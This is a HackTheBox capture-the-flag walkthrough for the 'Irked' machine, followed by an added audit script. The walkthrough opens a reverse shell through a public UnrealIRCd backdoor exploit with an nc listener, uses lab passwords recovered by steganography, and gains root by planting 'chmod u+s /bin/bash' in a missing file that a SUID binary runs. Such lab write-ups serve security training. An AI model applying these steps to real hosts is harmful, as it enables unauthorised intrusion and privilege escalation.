# Irked

Irked is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/163), created by MrAgent. In this post, my IP is 10.10.14.27, and the target IP is 10.129.124.47.

This machine is straightforward. It follows the basic steps for enumeration and exploitation, with some research included.

### Gathering Information

The first steps are about getting basic information about the target, using nmap and looking for information on the website.

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.124.47
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FXBrqpo9J170ejDmuwSqX%2Fimage.png?alt=media&#x26;token=9e9dba3e-0c82-4088-b4b6-e4a935475f86" alt=""><figcaption><p>There is a website and several ports related to IRC (Internet Relay Chat); we need more details.</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -sCV -p 22,80,111,6697,8067,34716,65534 10.129.124.47
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FWvDjszJQJhCRLB7HD6g7%2Fimage.png?alt=media&#x26;token=377b41bb-7525-4b0b-a824-9e1cea1ff852" alt=""><figcaption><p>There is definitely an IRC service running. IRC is a real-time communication protocol, and this service is something we can exploit.</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
whatweb -v http://10.129.124.47
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FeDaX3xKQM0yWHup5nlJv%2Fimage.png?alt=media&#x26;token=f06eb2d5-7c41-4ec8-b88d-796af1ecdc59" alt=""><figcaption><p>Nothing relevant</p></figcaption></figure>

* Browser: [http://10.129.124.47](http://10.129.124.47/)

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FFM66dwF9p8zn1LmcK0Ck%2Fimage.png?alt=media&#x26;token=2ae0768f-df3f-40d0-b457-b819c756fed6" alt=""><figcaption><p>Source code of the target website</p></figcaption></figure>

We have limited information, but that phrase is enough. At this point our best option is to search for **UnrealIRCd exploit**; you will find [this on GitHub](https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor).

### Weaponization and Exploitation

{% code title="Local Terminal" %}

```bash
git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor 
cd UnrealIRCd-3.2.8.1-Backdoor/
batcat exploit.py
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FxeziWmCLWB0CkmQXf0j7%2Fimage.png?alt=media&#x26;token=acf7ab61-9da2-4aaf-b8fa-0202592fb02b" alt=""><figcaption></figcaption></figure>

A few values need to be changed: set the IP and port of your own machine (here: 10.10.14.27 and 443). Further down, the script offers several payloads selectable through an argument; we will use bash.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FY59rKT7ltFQaOrxQ4C9f%2Fimage.png?alt=media&#x26;token=33d3c502-da29-4426-9dc3-b0b1988ecd34" alt=""><figcaption><p>List of payloads</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FUb9gL01gmrcbRFmILFxl%2Fimage.png?alt=media&#x26;token=48de3d2f-8b89-44b1-9829-d808d4ac9129" alt=""><figcaption><p>How to use exploit.py</p></figcaption></figure>

Here we need to open a new terminal and listen on port 443.

{% code title="Local Terminal \[B]" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Local Terminal \[A]" %}

```bash
python3 exploit.py 10.129.124.47 6697 -payload bash
```

{% endcode %}

We use target port 6697 because the IRC service is listening there. After execution, the message “Exploit sent successfully” appears and the second **local terminal \[B]** is connected to the target; from now on this terminal is called **\[IRCD]**. Now we start with some [TTY treatment](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade).

{% code title="Target Terminal \[IRCD]" %}

```bash
cd /
find -name user.txt 2>/dev/null
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FJPOiEKGaByPHY4k9ZIBx%2Fimage.png?alt=media&#x26;token=607819af-173e-4d8c-8f84-b2a6e27de53d" alt=""><figcaption></figcaption></figure>

After exploring a little, we find a hidden backup file in /home/djmardov/Documents. Let’s read it with cat and check what we can find.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FFVI74JJ9RB4ZXwdEid7J%2Fimage.png?alt=media&#x26;token=36dee1a5-9c34-4c3a-a0b5-7b0212ddb6ba" alt=""><figcaption><p>Backup hidden file</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FpCCX0gvYKOEWBwpt3X6K%2Fimage.png?alt=media&#x26;token=d6371938-0d64-4c4f-93c6-35a315641c23" alt=""><figcaption><p>Content of .backup</p></figcaption></figure>

Here we have two things: a clue about steganography, maybe pointing to the image at the URL, and a password, probably related to the steganography step. Now download the image (the angry face) from [http://10.129.124.47](http://10.129.124.47/) and open a local terminal.

{% code title="Local Terminal" %}

```bash
exiftool irked.jpg
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F9Ggr70EkC9iYpTO6T01f%2Fimage.png?alt=media&#x26;token=985ef50c-12d7-4c0c-ad21-a57a518fc184" alt=""><figcaption><p>Nothing weird</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
strings irked.jpg
steghide extract -sf irked.jpg              # Without password, it fails.
steghide extract -sf irked.jpg              # pass: UPupDOWNdownLRlrBAbaSSss
cat pass.txt
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FGHGgklNUatdHAsQaQotZ%2Fimage.png?alt=media&#x26;token=4a71cad1-efa3-4405-91b5-947b2c7fe396" alt=""><figcaption><p>New password!</p></figcaption></figure>

By using Steghide, we extract a new password, “Kab6h+m+bbp2J:HG”. We can try it in the IRCD terminal to switch user.

{% code title="Target Terminal \[IRCD]" %}

```bash
su djmardov                            #Pass: Kab6h+m+bbp2J:HG
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FWXlOCa7UY2suQ85UTn77%2Fimage.png?alt=media&#x26;token=1dc769b6-10df-4167-a7f4-13916138fa90" alt=""><figcaption></figcaption></figure>

It works. Now we are Djmardov and we can read the flag at /home/djmardov/Documents/user.txt.

### Privilege Escalation

{% code title="Target Terminal \[Djmardov]" %}

```bash
cd /
find -perm -4000 2>/dev/null
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FS6aSarzS9Oyn3k8rNTIW%2Fimage.png?alt=media&#x26;token=5873ee22-0616-48e8-9c09-e6ebe9eb4eee" alt=""><figcaption><p>It looks like a custom command</p></figcaption></figure>

{% code title="Target Terminal \[Djmardov]" %}

```bash
/usr/bin/viewuser
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FL7SQgIgOG5CJBnbfYPby%2Fimage.png?alt=media&#x26;token=12da747b-64f5-4aa4-be51-03ca788842e9" alt=""><figcaption><p>A beta for a command to work with permissions?</p></figcaption></figure>

{% code title="Target Terminal \[Djmardov]" %}

```bash
strings /usr/bin/viewuser
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FDi8AHO1UvYEWr90i1SmL%2Fimage.png?alt=media&#x26;token=32ce8ed1-8be9-436b-854a-f0530520b3df" alt=""><figcaption><p>By using strings, we can see that it needs the file /tmp/listusers</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FF0W9joL8yUJzCO8v7ixU%2Fimage.png?alt=media&#x26;token=b10c17ea-8989-4ddc-ba81-5527d1221d51" alt=""><figcaption><p>But it doesn’t even exist</p></figcaption></figure>

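We lose nothing by trying to create that file and put a command inside it: viewuser showed up in the SUID search, so if it executes /tmp/listusers, our command runs with the privileges of the binary's owner.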

{% code title="Target Terminal \[Djmardov]" %}

```bash
touch /tmp/listusers
chmod +x /tmp/listusers
nano /tmp/listusers
```

{% endcode %}

{% code title="Content of /tmp/listusers" %}

```bash
#!/bin/bash

chmod u+s /bin/bash
```

{% endcode %}

{% code title="Target Terminal \[Djmardov]" %}

```bash
ls -l /bin/bash
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FIwueUipiyKG94IYqQcMi%2Fimage.png?alt=media&#x26;token=68523c6d-d24b-4871-9cce-4ea7c13cd650" alt=""><figcaption><p>Looks like now we can use it, it works!</p></figcaption></figure>

{% code title="Target Terminal \[Djmardov]" %}

```bash
bash -p
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
cat /root/root.txt
```

{% endcode %}
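
The root cause above is a SUID binary that runs a file from a directory any user can write to. As an added example (not part of the original write-up or of the machine), the following audit helper looks for that pattern on a host you administer; the directory list and the function names are assumptions chosen for illustration.

```bash
# Added audit helper: list paths under world-writable directories that a
# binary embeds, the pattern /usr/bin/viewuser shows with /tmp/listusers.

# Directories assumed to be writable by any local user (extend as needed).
WRITABLE_DIRS='/tmp|/var/tmp|/dev/shm'

# Print each embedded path below a world-writable directory found in file $1.
# grep -a reads the binary as text and -o prints only the match, so the
# binutils `strings` tool is not needed on the audited host.
writable_refs() {
    LC_ALL=C grep -aoE "(${WRITABLE_DIRS})/[A-Za-z0-9._/-]+" "$1" 2>/dev/null | sort -u
}

# Classify a referenced path: "missing" (any user may create it), "writable"
# (group- or other-writable), or "present" (exists with tighter permissions).
ref_status() {
    if [ ! -e "$1" ]; then
        echo missing
    elif [ -n "$(find "$1" -prune \( -perm -0002 -o -perm -0020 \) -print 2>/dev/null)" ]; then
        echo writable
    else
        echo present
    fi
}

# Report "binary -> path [status]" for every risky reference in one binary.
audit_binary() {
    writable_refs "$1" | while IFS= read -r ref; do
        printf '%s -> %s [%s]\n' "$1" "$ref" "$(ref_status "$ref")"
    done
}

# Audit every set-uid or set-gid regular file below $1 (default: /).
audit_tree() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r bin; do
        audit_binary "$bin"
    done
}

# Usage on a host you administer:  audit_tree /
```

Any `missing` or `writable` result for a SUID binary deserves review: the fix is to remove the set-uid bit or have the program use a file in a root-owned directory instead.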
